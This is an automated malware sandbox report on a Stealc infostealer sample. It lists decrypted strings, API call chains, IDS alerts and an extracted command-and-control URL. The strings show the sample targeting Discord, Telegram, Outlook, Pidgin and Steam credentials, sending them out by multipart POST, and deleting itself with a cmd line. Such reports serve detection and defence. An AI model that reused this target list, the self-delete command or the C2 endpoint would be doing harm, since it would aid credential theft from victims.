                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %08lX%04lX%lu
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: ProductName
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: x32
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: x64
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: DisplayName
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: DisplayVersion
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Network Info:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - IP: IP?
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Country: ISO?
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: System Summary:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - HWID:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - OS:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Architecture:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - UserName:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Computer Name:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Local Time:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - UTC:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Language:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Keyboards:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Laptop:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Running Path:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - CPU:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Threads:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Cores:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - RAM:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - Display Resolution:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: - GPU:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: User Agents:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Installed Apps:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: All Users:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Current User:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Process List:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: system_info.txt
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: freebl3.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: mozglue.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: msvcp140.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: nss3.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: softokn3.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: vcruntime140.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \Temp\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: .exe
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: runas
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: open
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: /c start
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %DESKTOP%
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %APPDATA%
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %LOCALAPPDATA%
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %USERPROFILE%
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %DOCUMENTS%
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %RECENT%
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: *.lnk
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: files
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \discord\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \Local Storage\leveldb
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \Telegram Desktop\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: key_datas
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: map*
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: F8806DD0C461824F*
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Telegram
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Tox
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: *.tox
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: *.ini
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Password
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: 00000001
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: 00000002
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: 00000003
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: 00000004
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \Outlook\accounts.txt
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Pidgin
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \.purple\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: accounts.xml
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: dQw4w9WgXcQ
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: token:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Software\Valve\Steam
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SteamPath
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \config\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: ssfn*
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: config.vdf
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: DialogConfig.vdf
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: libraryfolders.vdf
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: loginusers.vdf
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \Steam\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: done
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: soft
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: \Discord\tokens.txt
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: https
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: POST
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: HTTP/1.1
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: hwid
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: build
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: token
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: file_name
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: file
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: message
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: screenshot.jpg
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,1_2_00406000
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,1_2_00404B80
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00407690
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00424090
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_00409BE0
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00409B80
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02479E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_02479E47
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02476267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_02476267
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02487260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,1_2_02487260
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_024942F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_024942F7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0247EFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,1_2_0247EFF7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02487047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,1_2_02487047
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_024778F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_024778F7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02474DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_02474DE7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02479DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_02479DE7

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeUnpacked PE file: 0.2.SEejSLAS9f.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeUnpacked PE file: 1.2.1D71.tmp.exe.400000.0.unpack
                    Source: SEejSLAS9f.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02481EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02481EA7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0248CF47
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02483F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02483F27
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0247DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0247DFD7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02471807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02471807
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02471820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02471820
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02481827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02481827
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0248D8A7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_0248E0B7
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02485127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02485127
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0248E597

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 92.255.57.89:80
                    Source: Malware configuration extractorURLs: http://92.255.57.89/45c616e921a794b8.php
